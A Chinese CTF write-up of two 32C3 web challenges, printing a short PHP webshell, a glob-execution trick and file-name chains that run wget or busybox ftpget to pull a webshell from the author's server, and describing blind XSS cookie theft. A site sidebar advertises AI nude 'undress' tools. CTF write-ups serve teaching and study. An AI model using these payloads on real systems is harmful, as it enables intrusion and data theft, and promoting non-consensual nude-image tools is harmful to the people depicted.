32C3 CTF 两个Web题目的Writeup
0x00 简介
作为一个销售狗,还能做得动Web题,十分开心。 这次搞了两个题目,一个是TinyHosting,一个是Kummerkasten。
0x01 TingHosting
A new file hosting service for very small files. could you pwn it?http://136.243.194.53/
可以首先在页面中发现一个隐藏的src参数,在URL里加上?src=1之后可以返回出页面的源代码。
大概的意思就是说可以往服务器上传任意文件名的文件,不过每个文件的内容只有有7个字符那么长。
于是首先google了一下,最短的php webshell应该是14字符的这个:
#!php<?=`$_GET[1]`;
(PS:原文的该代码被转意过了,若有错误...见谅.
显然不够长啊。
后来脑洞了很多,想到了可爱的 * ,于是很重要的payload是:
#!bashz.php
内容为:
#!php<?=`*`;
刚好七个字符,不多不少,能把当前目录下的所有玩意按顺序执行一遍。
于是就要构造一些执行链了,一开始的想法是:
#!bashbusybox ftpget two.dog w.php z.php
其中前4个文件内容随意,w.php是上面的关键payload,执行w.php后其内容被我服务器上的webshell覆盖,而获取webshell。
结果悲剧的发现 busybox ftpget 支持的host只能是ip,而不支持域名。
后来想通过wget来构造,利用了302跳转可以跨协议的特点。
#!bashwget wtf.two.dog z.php
前两个文件人意内容,z.php为重要payload,即可拿下webshell。
但仔细一看,这题会在每一个人的目录下创建一个 index.html ,于是执行链被破环没法工作。
于是使用bash来先干掉index.html
构造:
#!bashbash bb index.html z.php
其中bash内容随意,bb的内容为 rm ./* 不超过7个字符。然后再通过上面的方法即可获得一个webshell,然后在根目录发现一个flag。
之后看了老外的做法真是简单好用,就利用bash、bb和z.php,bb的内容分别为 ls / , cat /f* ,简单直接0 0
0x02 Kummerkasten
Our Admin is a little sad this time of the year. Maybe you can cheer him up at this site http://136.243.194.46/Please note: This challenge does not follow the flag format.
Hints:To build the flag, concatenate both parts and omit '32C3_'
进去之后只有一个提交留言的地方,四下看了看没发现别的东西,感觉和XSS会有关。
直接丢了一个盲打cookie的payload之后收到了回显:
访问过去是403,感觉需要用XSS来读一下页面的内容。
本来的思路是XSS里带上jQuery然后用jQuery操作,结果发现页面里面有,太方便了。
直接用ajax可以轻松读取页面并回传。
看到了 /admin/bugs 和 /admin/token
根据页面中的信息来看,关键是要读两个png图片回来。
最后的payload如下:
然后把两个图里的内容,一个mysql的password和一个6位数字拼起来就是FLAG咯。
0x03 Other
更多的writeup可以参考如下链接:
https://github.com/ctfs/write-ups-2015/tree/master/32c3-ctf-2015/web

熱AI工具

Undresser.AI Undress
人工智慧驅動的應用程序,用於創建逼真的裸體照片

AI Clothes Remover
用於從照片中去除衣服的線上人工智慧工具。

Undress AI Tool
免費脫衣圖片

Clothoff.io
AI脫衣器

AI Hentai Generator
免費產生 AI 無盡。

熱門文章

熱工具

記事本++7.3.1
好用且免費的程式碼編輯器

SublimeText3漢化版
中文版,非常好用

禪工作室 13.0.1
強大的PHP整合開發環境

Dreamweaver CS6
視覺化網頁開發工具

SublimeText3 Mac版
神級程式碼編輯軟體(SublimeText3)

熱門話題

JWT是一種基於JSON的開放標準,用於在各方之間安全地傳輸信息,主要用於身份驗證和信息交換。 1.JWT由Header、Payload和Signature三部分組成。 2.JWT的工作原理包括生成JWT、驗證JWT和解析Payload三個步驟。 3.在PHP中使用JWT進行身份驗證時,可以生成和驗證JWT,並在高級用法中包含用戶角色和權限信息。 4.常見錯誤包括簽名驗證失敗、令牌過期和Payload過大,調試技巧包括使用調試工具和日誌記錄。 5.性能優化和最佳實踐包括使用合適的簽名算法、合理設置有效期、

文章討論了PHP 5.3中介紹的PHP中的晚期靜態結合(LSB),允許靜態方法的運行時間分辨率調用以更靈活的繼承。 LSB的實用應用和潛在的觸摸

使用PHP的cURL庫發送JSON數據在PHP開發中,經常需要與外部API進行交互,其中一種常見的方式是使用cURL庫發送POST�...

SOLID原則在PHP開發中的應用包括:1.單一職責原則(SRP):每個類只負責一個功能。 2.開閉原則(OCP):通過擴展而非修改實現變化。 3.里氏替換原則(LSP):子類可替換基類而不影響程序正確性。 4.接口隔離原則(ISP):使用細粒度接口避免依賴不使用的方法。 5.依賴倒置原則(DIP):高低層次模塊都依賴於抽象,通過依賴注入實現。

深入解讀ReactPHP的非阻塞特性ReactPHP的一段官方介紹引起了不少開發者的疑問:“ReactPHPisnon-blockingbydefault....
